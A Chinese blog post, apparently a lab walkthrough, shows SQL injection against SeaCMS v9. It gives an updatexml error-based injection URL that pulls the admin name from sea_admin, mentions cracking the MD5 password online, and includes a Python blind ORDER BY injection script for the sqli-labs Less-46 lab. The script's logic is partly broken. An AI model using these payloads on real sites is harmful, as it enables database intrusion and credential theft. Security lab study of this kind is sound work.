当前位置: 首页 > article >正文

海洋cmsv9报错注入,order by 和limit注入

海洋cmsv9

1,我们拿到海洋cmsv9源码分析发现注入点,$rlist

2,seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为
sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password

经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):
127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
第一次尝试:

我们发现注入并没有成功

接下来我们在数据库查看表的情况

我们发现sea_comment中并没有数据所以并没有回显

那我们就添加数据

insert into sea_comment(id,uid,v_id,typeid,username,ip,ischeck,dtime,msg,m_type,reply,agree,anti,pic,vote) values (1,2,3,4,'hyd1','192,168,106,133',1,01,'sample comment',0,0,0,0,'exam01.jpg',0),(5,6,7,8,'hyd2','192,168,106,134',2,02,'sample comment',0,0,0,0,'exam02.jpg',0);

然后我们重新进行注入

发现密码是通过MD5加密了的

所以就到md5在线解密破解,md5解密加密这个网站解密

oeder by

我们发现俩次username中发现第6行不一样,所以我们可以利用这里进行注入

import requests
from bs4 import BeautifulSoup


def getDatabase(url):
    dataname = ''

    for i in range(1, 20):  # 检查每个字符位置
        for j in range(32,127):
            payload = "if(ascii(substr(database(),%d,1))=%d,username,password) -- " % (i, j)
            res = {"sort": payload}
            r = requests.get(url, params=res)
            # 检查返回内容,使用 BeautifulSoup 解析 HTML
            soup = BeautifulSoup(r.text, 'html.parser')
            # 提取密码列第6行
            password_row = soup.find_all('tr')[6]  # 第6行(索引为5)
            password_column = password_row.find_all('td')[1]  # 假设密码在第二列
            # 如果返回的是 'crappy',则跳过该字符
            #print(password_column.text.strip())
            if password_column.text.strip() == 'secure':
                #print(1)  # 如果是 crapp,就跳过当前字符
                w=1
            else:
        # 如果没有找到有效字符,或者跳过该字符,则继续下一个字符
                dataname += chr(j)  # 将识别到的字符添加到数据库名称
        print(dataname)  # 打印当前已经找到的字符

if __name__ == '__main__':
    url = 'http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php'
    getDatabase(url)


http://www.kler.cn/a/568302.html

相关文章:

  • NFC拉起微信小程序申请URL scheme 汇总
  • JavaScript 简单类型与复杂类型-简单类型传参
  • Spring Boot拦截器(Interceptor)与过滤器(Filter)详细教程
  • EtherCAT总线学习笔记
  • 【03】STM32F407 HAL 库框架设计学习
  • openEuler环境下GlusterFS分布式存储集群部署指南
  • 前缀和 C++
  • 【pytest框架源码分析三】pluggy源码分析之hook注册调用流程
  • WordPress多语言插件GTranslate
  • (17)CT137A- UART串口发送实验
  • 【江科协-STM32】5. 输出比较
  • 当我删除word文件时无法删除,提示:操作无法完成,因为已在Microsoft Word中打开
  • Linux下的网络通信编程
  • 2.8作业
  • 自然语言处理:稠密向量表示
  • 基于PHP和MySQL的用户登录注册系统实现
  • NAT 技术:网络中的 “地址魔术师”
  • Week2 Using the Java Collection Libraries Lecture 2
  • 网络协议 HTTP、HTTPS、HTTP/1.1、HTTP/2 对比分析
  • 哪些方法可以查看drupal版本